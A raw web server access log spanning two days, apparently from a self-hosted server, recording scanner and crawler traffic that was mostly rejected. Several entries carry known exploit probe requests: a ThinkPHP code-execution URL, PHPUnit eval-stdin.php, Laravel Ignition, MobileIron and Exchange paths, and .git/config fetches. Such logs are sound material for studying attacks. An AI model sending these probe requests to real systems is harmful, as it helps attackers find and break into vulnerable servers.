[26/Aug/2021:08:31:39 +0000] 444 - GET https 64.22.31.253 "/console/" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [26/Aug/2021:08:31:40 +0000] 444 - GET https 64.22.31.253 "/?XDEBUG_SESSION_START=phpstorm" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [26/Aug/2021:08:31:41 +0000] 444 - POST https 64.22.31.253 "/Autodiscover/Autodiscover.xml" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [26/Aug/2021:08:31:41 +0000] 444 - GET https 64.22.31.253 "/" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [26/Aug/2021:08:31:43 +0000] 444 - GET https 64.22.31.253 "/_ignition/execute-solution" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [26/Aug/2021:09:41:02 +0000] 444 - GET https io.moralanimal.net "/robots.txt" [Client 138.246.253.24] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.146 Safari/537.36" "-" [26/Aug/2021:09:41:02 +0000] 444 - GET https io.moralanimal.net "/robots.txt" [Client 138.246.253.24] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.146 Safari/537.36" "-" [26/Aug/2021:10:13:01 +0000] 444 - GET https 64.22.31.253 "/" [Client 34.79.107.251] [Length 0] [Gzip -] "python-requests/2.26.0" "-" [26/Aug/2021:10:27:10 +0000] 444 - GET https 64.22.31.253 "/owa/auth/logon.aspx?url=https%3a%2f%2f1%2fecp%2f" [Client 192.241.216.106] [Length 0] [Gzip -] "Mozilla/5.0 zgrab/0.x" "-" [26/Aug/2021:10:43:08 +0000] 400 - GET http 64.22.31.253 "/config/getuser?index=0" [Client 209.141.51.176] [Length 252] [Gzip -] "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:76.0) Gecko/20100101 Firefox/76.0" "-" [26/Aug/2021:12:52:17 +0000] 444 - GET https 139.162.113.11 "/" [Client 31.192.236.27] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 6.3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/68.0.3440.91 Safari/537.36 OPR/55.0.2994.61" "-" [26/Aug/2021:12:56:18 +0000] 400 - GET http 64.22.31.253 "/config/getuser?index=0" [Client 209.141.51.176] [Length 252] [Gzip -] "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:76.0) Gecko/20100101 Firefox/76.0" "-" [26/Aug/2021:13:20:49 +0000] 444 - GET https 64.22.31.253 "/" [Client 183.136.225.14] [Length 0] [Gzip -] "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.11; rv:47.0) Gecko/20100101 Firefox/47.0" "-" [26/Aug/2021:14:27:01 +0000] 444 - GET https 64.22.31.253 "/" [Client 212.41.22.76] [Length 0] [Gzip -] "Mozilla/5.0 (iPhone; CPU iPhone OS 8_1 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12B410 Safari/600.1.4" "-" [26/Aug/2021:15:07:39 +0000] 444 - GET https agent.moralanimal.net "/.git/config" [Client 195.176.3.19] [Length 0] [Gzip -] "Go-http-client/1.1" "-" [26/Aug/2021:15:25:59 +0000] 444 - GET https 64.22.31.253 "/" [Client 193.46.254.155] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.90 Safari/537.36" "-" [26/Aug/2021:17:01:29 +0000] 444 - GET https 192.168.1.12 "/" [Client 192.168.1.2] [Length 0] [Gzip -] "Mozilla / 5.0(Windows NT 10.0; &) Gecko / 20100101 Firefox / 62.0" "-" [26/Aug/2021:17:01:29 +0000] 444 - GET https 192.168.1.12 "/" [Client 192.168.1.2] [Length 0] [Gzip -] "Mozilla / 5.0(Windows NT 10.0; &) Gecko / 20100101 Firefox / 62.0" "-" [26/Aug/2021:17:01:29 +0000] 444 - GET https 192.168.1.12 "/ui/" [Client 192.168.1.2] [Length 0] [Gzip -] "Mozilla / 5.0(Windows NT 10.0; &) Gecko / 20100101 Firefox / 62.0" "-" [26/Aug/2021:17:01:29 +0000] 444 - GET https 192.168.1.12 "/ui/" [Client 192.168.1.2] [Length 0] [Gzip -] "Mozilla / 5.0(Windows NT 10.0; &) Gecko / 20100101 Firefox / 62.0" "-" [26/Aug/2021:17:01:29 +0000] 444 - GET https 192.168.1.12 "/favicon.ico" [Client 192.168.1.2] [Length 0] [Gzip -] "Mozilla / 5.0(Windows NT 10.0; &) Gecko / 20100101 Firefox / 62.0" "-" [26/Aug/2021:17:01:29 +0000] 444 - GET https 192.168.1.12 "/favicon.ico" [Client 192.168.1.2] [Length 0] [Gzip -] "Mozilla / 5.0(Windows NT 10.0; &) Gecko / 20100101 Firefox / 62.0" "-" [26/Aug/2021:17:05:13 +0000] 444 - GET https 64.22.31.253 "/owa/auth/x.js" [Client 192.241.219.204] [Length 0] [Gzip -] "Mozilla/5.0 zgrab/0.x" "-" [26/Aug/2021:17:17:21 +0000] 444 - GET https 64.22.31.253 "/ecp/Current/exporttool/microsoft.exchange.ediscovery.exporttool.application" [Client 192.241.200.126] [Length 0] [Gzip -] "Mozilla/5.0 zgrab/0.x" "-" [26/Aug/2021:17:27:44 +0000] 444 - GET https 64.22.31.253 "/owa/auth/logon.aspx" [Client 192.241.218.238] [Length 0] [Gzip -] "Mozilla/5.0 zgrab/0.x" "-" [26/Aug/2021:18:17:40 +0000] 444 - GET https 64.22.31.253 "/" [Client 23.251.102.74] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36" "-" [26/Aug/2021:18:49:44 +0000] 444 - GET https router.moralanimal.net "/robots.txt" [Client 138.246.253.24] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.146 Safari/537.36" "-" [26/Aug/2021:18:49:44 +0000] 444 - GET https router.moralanimal.net "/robots.txt" [Client 138.246.253.24] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.146 Safari/537.36" "-" [26/Aug/2021:19:48:43 +0000] 444 - GET https 64.22.31.253 "/" [Client 128.14.134.170] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36" "-" [26/Aug/2021:20:14:33 +0000] 444 - GET https 64.22.31.253 "/actuator/health" [Client 192.241.219.165] [Length 0] [Gzip -] "Mozilla/5.0 zgrab/0.x" "-" [26/Aug/2021:20:51:42 +0000] 400 - GET http 64.22.31.253 "/config/getuser?index=0" [Client 209.141.51.176] [Length 252] [Gzip -] "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:76.0) Gecko/20100101 Firefox/76.0" "-" [26/Aug/2021:21:05:48 +0000] 444 - GET https home.moralanimal.net "/robots.txt" [Client 138.246.253.24] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.146 Safari/537.36" "-" [26/Aug/2021:21:05:48 +0000] 444 - GET https home.moralanimal.net "/robots.txt" [Client 138.246.253.24] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.146 Safari/537.36" "-" [26/Aug/2021:23:14:40 +0000] 444 - GET https 64.22.31.253 "/ecp/Current/exporttool/microsoft.exchange.ediscovery.exporttool.application" [Client 192.241.197.175] [Length 0] [Gzip -] "Mozilla/5.0 zgrab/0.x" "-" [26/Aug/2021:23:34:22 +0000] 444 - GET https 64.22.31.253 "/" [Client 23.129.64.133] [Length 0] [Gzip -] "Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)" "-" [26/Aug/2021:23:34:27 +0000] 444 - OPTIONS https localhost "/" [Client 23.129.64.161] [Length 0] [Gzip -] "-" "-" [26/Aug/2021:23:34:29 +0000] 444 - GET https localhost "/nice%20ports%2C/Tri%6Eity.txt%2ebak" [Client 23.129.64.158] [Length 0] [Gzip -] "-" "-" [26/Aug/2021:23:34:30 +0000] 400 - - https localhost "-" [Client 23.129.64.158] [Length 154] [Gzip -] "-" "-" [26/Aug/2021:23:36:13 +0000] 444 - GET https 64.22.31.253 "/" [Client 104.206.128.6] [Length 0] [Gzip -] "https://gdnplus.com:Gather Analyze Provide." "-" [27/Aug/2021:00:43:47 +0000] 444 - GET https 64.22.31.253 "/" [Client 85.159.213.167] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:8.0) Gecko/20100101 Firefox/8.0" "-" [27/Aug/2021:00:49:58 +0000] 444 - GET https oauth.moralanimal.net "/" [Client 124.126.78.178] [Length 0] [Gzip -] "Mozilla/5.0 (Linux; Android 10.0; MI 2 Build/O012) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4472.114 Mobile Safari/537.36" "-" [27/Aug/2021:01:37:04 +0000] 444 - GET https tpm.moralanimal.net "/robots.txt" [Client 138.246.253.24] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.146 Safari/537.36" "-" [27/Aug/2021:01:37:05 +0000] 444 - GET https tpm.moralanimal.net "/robots.txt" [Client 138.246.253.24] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.146 Safari/537.36" "-" [27/Aug/2021:03:27:49 +0000] 444 - OPTIONS https 64.22.31.253 "/" [Client 195.78.54.191] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36" "-" [27/Aug/2021:03:54:19 +0000] 444 - GET https 64.22.31.253 "/" [Client 74.120.14.57] [Length 0] [Gzip -] "-" "-" [27/Aug/2021:03:54:20 +0000] 400 - GET http 64.22.31.253 "/" [Client 74.120.14.57] [Length 252] [Gzip -] "-" "-" [27/Aug/2021:03:54:20 +0000] 400 - GET http 64.22.31.253 "/" [Client 74.120.14.57] [Length 252] [Gzip -] "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)" "-" [27/Aug/2021:04:09:46 +0000] 444 - GET https 64.22.31.253 "/" [Client 192.241.205.249] [Length 0] [Gzip -] "Mozilla/5.0 zgrab/0.x" "-" [27/Aug/2021:04:14:02 +0000] 444 - GET https 64.22.31.253 "/" [Client 80.82.77.192] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.190 Safari/537.36" "-" [27/Aug/2021:04:19:23 +0000] 400 - GET http 64.22.31.253 "/" [Client 80.82.77.192] [Length 252] [Gzip -] "Mozilla/5.0 zgrab/0.x" "-" [27/Aug/2021:04:52:38 +0000] 444 - GET https 64.22.31.253 "/" [Client 184.72.79.167] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 6.2;en-US) AppleWebKit/537.32.36 (KHTML, live Gecko) Chrome/52.0.3018.51 Safari/537.32" "-" [27/Aug/2021:04:52:38 +0000] 444 - GET https 64.22.31.253 "/" [Client 184.72.79.167] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 6.2;en-US) AppleWebKit/537.32.36 (KHTML, live Gecko) Chrome/52.0.3018.51 Safari/537.32" "-" [27/Aug/2021:05:26:31 +0000] 444 - GET https booksonic.moralanimal.net "/robots.txt" [Client 138.246.253.24] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.146 Safari/537.36" "-" [27/Aug/2021:05:26:32 +0000] 444 - GET https booksonic.moralanimal.net "/robots.txt" [Client 138.246.253.24] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.146 Safari/537.36" "-" [27/Aug/2021:05:39:37 +0000] 444 - GET https 64.22.31.253 "/" [Client 184.105.247.194] [Length 0] [Gzip -] "-" "-" [27/Aug/2021:06:11:24 +0000] 444 - GET https 64.22.31.253 "/" [Client 193.106.29.210] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:90.0) Gecko/20100101 Firefox/90.0" "-" [27/Aug/2021:07:39:29 +0000] 400 - GET http 64.22.31.253 "/config/getuser?index=0" [Client 209.141.51.176] [Length 252] [Gzip -] "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:76.0) Gecko/20100101 Firefox/76.0" "-" [27/Aug/2021:07:55:03 +0000] 444 - GET https 64.22.31.253 "/" [Client 128.1.248.42] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36" "-" [27/Aug/2021:09:49:33 +0000] 444 - GET https whoami.moralanimal.net "/robots.txt" [Client 138.246.253.24] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.146 Safari/537.36" "-" [27/Aug/2021:09:49:34 +0000] 444 - GET https whoami.moralanimal.net "/robots.txt" [Client 138.246.253.24] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.146 Safari/537.36" "-" [27/Aug/2021:09:54:15 +0000] 444 - GET https 64.22.31.253 "/" [Client 167.248.133.59] [Length 0] [Gzip -] "-" "-" [27/Aug/2021:09:54:16 +0000] 400 - GET http 64.22.31.253 "/" [Client 167.248.133.59] [Length 252] [Gzip -] "-" "-" [27/Aug/2021:09:54:16 +0000] 400 - GET http 64.22.31.253 "/" [Client 167.248.133.59] [Length 252] [Gzip -] "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)" "-" [27/Aug/2021:10:30:59 +0000] 444 - GET https 64.22.31.253 "/owa/auth/logon.aspx?url=https%3a%2f%2f1%2fecp%2f" [Client 192.241.219.147] [Length 0] [Gzip -] "Mozilla/5.0 zgrab/0.x" "-" [27/Aug/2021:10:32:11 +0000] 444 - GET https komga.moralanimal.net "/robots.txt" [Client 138.246.253.24] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.146 Safari/537.36" "-" [27/Aug/2021:10:32:11 +0000] 444 - GET https komga.moralanimal.net "/robots.txt" [Client 138.246.253.24] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.146 Safari/537.36" "-" [27/Aug/2021:11:20:11 +0000] 444 - POST https 64.22.31.253 "/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [27/Aug/2021:11:20:12 +0000] 444 - POST https 64.22.31.253 "/api/jsonws/invoke" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [27/Aug/2021:11:20:15 +0000] 444 - GET https 64.22.31.253 "/index.php?s=/Index/\x5Cthink\x5Capp/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=HelloThinkPHP21" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [27/Aug/2021:11:20:15 +0000] 444 - GET https 64.22.31.253 "/?XDEBUG_SESSION_START=phpstorm" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [27/Aug/2021:11:20:15 +0000] 444 - GET https 64.22.31.253 "/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [27/Aug/2021:11:20:19 +0000] 444 - GET https 64.22.31.253 "/wp-content/plugins/wp-file-manager/readme.txt" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [27/Aug/2021:11:20:20 +0000] 444 - POST https 64.22.31.253 "/mifs/.;/services/LogService" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "https://64.22.31.253:443" [27/Aug/2021:11:20:22 +0000] 444 - GET https 64.22.31.253 "/console/" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [27/Aug/2021:11:20:24 +0000] 444 - POST https 64.22.31.253 "/Autodiscover/Autodiscover.xml" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [27/Aug/2021:11:20:26 +0000] 444 - GET https 64.22.31.253 "/_ignition/execute-solution" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [27/Aug/2021:11:53:24 +0000] 444 - GET https 64.22.31.253 "/" [Client 193.46.254.155] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.90 Safari/537.36" "-" [27/Aug/2021:12:37:53 +0000] 444 - GET https oauth.moralanimal.net "/robots.txt" [Client 138.246.253.24] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.146 Safari/537.36" "-" [27/Aug/2021:12:37:54 +0000] 444 - GET https oauth.moralanimal.net "/robots.txt" [Client 138.246.253.24] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.146 Safari/537.36" "-" [27/Aug/2021:12:55:34 +0000] 444 - GET https 64.22.31.253 "/" [Client 185.163.109.66] [Length 0] [Gzip -] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/537.36" "-" [27/Aug/2021:12:55:35 +0000] 444 - GET https 64.22.31.253 "/" [Client 185.163.109.66] [Length 0] [Gzip -] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/537.36" "-" [27/Aug/2021:12:55:35 +0000] 444 - GET https 64.22.31.253 "/" [Client 185.163.109.66] [Length 0] [Gzip -] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/537.36" "-" [27/Aug/2021:12:55:41 +0000] 400 - - https localhost "-" [Client 185.163.109.66] [Length 0] [Gzip -] "-" "-" [27/Aug/2021:12:55:41 +0000] 400 - - https localhost "-" [Client 185.163.109.66] [Length 0] [Gzip -] "-" "-" [27/Aug/2021:12:55:42 +0000] 400 - - https localhost "-" [Client 185.163.109.66] [Length 0] [Gzip -] "-" "-" [27/Aug/2021:12:55:46 +0000] 444 - GET https 64.22.31.253 "/robots.txt" [Client 185.163.109.66] [Length 0] [Gzip -] "-" "-" [27/Aug/2021:12:55:47 +0000] 444 - GET https 64.22.31.253 "/sitemap.xml" [Client 185.163.109.66] [Length 0] [Gzip -] "-" "-" [27/Aug/2021:12:55:47 +0000] 444 - GET https 64.22.31.253 "/.well-known/security.txt" [Client 185.163.109.66] [Length 0] [Gzip -] "-" "-" [27/Aug/2021:12:55:52 +0000] 444 - GET https 64.22.31.253 "/" [Client 34.79.68.246] [Length 0] [Gzip -] "python-requests/2.26.0" "-" [27/Aug/2021:13:33:01 +0000] 444 - GET https 64.22.31.253 "/" [Client 128.14.134.134] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36" "-" [27/Aug/2021:14:20:07 +0000] 444 - GET https 64.22.31.253 "/" [Client 183.136.225.14] [Length 0] [Gzip -] "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.11; rv:47.0) Gecko/20100101 Firefox/47.0" "-" [27/Aug/2021:15:08:18 +0000] 444 - GET https 64.22.31.253 "/" [Client 89.248.165.251] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 5.1; rv:9.0.1) Gecko/20100101 Firefox/9.0.1" "-" [27/Aug/2021:15:08:18 +0000] 444 - GET https 64.22.31.253 "/" [Client 89.248.165.251] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 5.1; rv:9.0.1) Gecko/20100101 Firefox/9.0.1" "-" [27/Aug/2021:15:08:19 +0000] 444 - GET https 64.22.31.253 "/" [Client 89.248.165.251] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 5.1; rv:9.0.1) Gecko/20100101 Firefox/9.0.1" "-" [27/Aug/2021:15:08:19 +0000] 400 - GET http 64.22.31.253 "/" [Client 89.248.165.251] [Length 252] [Gzip -] "Mozilla/5.0 (Windows NT 5.1; rv:9.0.1) Gecko/20100101 Firefox/9.0.1" "-" [27/Aug/2021:15:08:19 +0000] 400 - GET http 64.22.31.253 "/" [Client 89.248.165.251] [Length 252] [Gzip -] "Mozilla/5.0 (Windows NT 5.1; rv:9.0.1) Gecko/20100101 Firefox/9.0.1" "-" [27/Aug/2021:15:08:19 +0000] 400 - GET http 64.22.31.253 "/" [Client 89.248.165.251] [Length 252] [Gzip -] "Mozilla/5.0 (Windows NT 5.1; rv:9.0.1) Gecko/20100101 Firefox/9.0.1" "-" [27/Aug/2021:15:59:29 +0000] 444 - GET https sql.moralanimal.net "/robots.txt" [Client 138.246.253.24] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.146 Safari/537.36" "-" [27/Aug/2021:15:59:29 +0000] 444 - GET https sql.moralanimal.net "/robots.txt" [Client 138.246.253.24] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.146 Safari/537.36" "-" [27/Aug/2021:16:29:52 +0000] 444 - GET https 64.22.31.253 "/" [Client 128.1.248.42] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36" "-" [27/Aug/2021:16:55:50 +0000] 444 - GET https mosquitto.moralanimal.net "/robots.txt" [Client 138.246.253.24] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.146 Safari/537.36" "-" [27/Aug/2021:16:55:50 +0000] 444 - GET https mosquitto.moralanimal.net "/robots.txt" [Client 138.246.253.24] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.146 Safari/537.36" "-" [27/Aug/2021:17:05:56 +0000] 444 - GET https 64.22.31.253 "/owa/auth/x.js" [Client 192.241.213.229] [Length 0] [Gzip -] "Mozilla/5.0 zgrab/0.x" "-" [27/Aug/2021:17:19:07 +0000] 444 - GET https 64.22.31.253 "/ecp/Current/exporttool/microsoft.exchange.ediscovery.exporttool.application" [Client 192.241.205.252] [Length 0] [Gzip -] "Mozilla/5.0 zgrab/0.x" "-" [27/Aug/2021:17:28:21 +0000] 444 - GET https 64.22.31.253 "/owa/auth/logon.aspx" [Client 192.241.192.49] [Length 0] [Gzip -] "Mozilla/5.0 zgrab/0.x" "-" [27/Aug/2021:17:46:48 +0000] 444 - GET https localhost "/" [Client 178.73.215.171] [Length 0] [Gzip -] "-" "-" [27/Aug/2021:20:14:22 +0000] 400 - GET http localhost "/admin/config.php" [Client 77.247.108.81] [Length 154] [Gzip -] "gbrmss/7.29.0" "-" [27/Aug/2021:20:17:46 +0000] 444 - GET https 64.22.31.253 "/actuator/health" [Client 192.241.202.112] [Length 0] [Gzip -] "Mozilla/5.0 zgrab/0.x" "-" [27/Aug/2021:20:42:16 +0000] 444 - GET https 192.168.1.12 "/" [Client 192.168.1.2] [Length 0] [Gzip -] "Mozilla / 5.0(Windows NT 10.0; &) Gecko / 20100101 Firefox / 62.0" "-" [27/Aug/2021:20:42:16 +0000] 444 - GET https 192.168.1.12 "/" [Client 192.168.1.2] [Length 0] [Gzip -] "Mozilla / 5.0(Windows NT 10.0; &) Gecko / 20100101 Firefox / 62.0" "-" [27/Aug/2021:20:42:16 +0000] 444 - GET https 192.168.1.12 "/ui/" [Client 192.168.1.2] [Length 0] [Gzip -] "Mozilla / 5.0(Windows NT 10.0; &) Gecko / 20100101 Firefox / 62.0" "-" [27/Aug/2021:20:42:16 +0000] 444 - GET https 192.168.1.12 "/ui/" [Client 192.168.1.2] [Length 0] [Gzip -] "Mozilla / 5.0(Windows NT 10.0; &) Gecko / 20100101 Firefox / 62.0" "-" [27/Aug/2021:20:42:16 +0000] 444 - GET https 192.168.1.12 "/favicon.ico" [Client 192.168.1.2] [Length 0] [Gzip -] "Mozilla / 5.0(Windows NT 10.0; &) Gecko / 20100101 Firefox / 62.0" "-" [27/Aug/2021:20:42:16 +0000] 444 - GET https 192.168.1.12 "/favicon.ico" [Client 192.168.1.2] [Length 0] [Gzip -] "Mozilla / 5.0(Windows NT 10.0; &) Gecko / 20100101 Firefox / 62.0" "-" [27/Aug/2021:23:17:20 +0000] 444 - GET https 64.22.31.253 "/" [Client 128.1.248.42] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36" "-" [27/Aug/2021:23:18:30 +0000] 444 - GET https 64.22.31.253 "/ecp/Current/exporttool/microsoft.exchange.ediscovery.exporttool.application" [Client 192.241.220.186] [Length 0] [Gzip -] "Mozilla/5.0 zgrab/0.x" "-" [27/Aug/2021:23:46:06 +0000] 444 - POST https 64.22.31.253 "/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [27/Aug/2021:23:46:06 +0000] 444 - GET https 64.22.31.253 "/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [27/Aug/2021:23:46:09 +0000] 444 - POST https 64.22.31.253 "/mifs/.;/services/LogService" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "https://64.22.31.253:443" [27/Aug/2021:23:46:09 +0000] 444 - GET https 64.22.31.253 "/?XDEBUG_SESSION_START=phpstorm" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [27/Aug/2021:23:46:11 +0000] 444 - POST 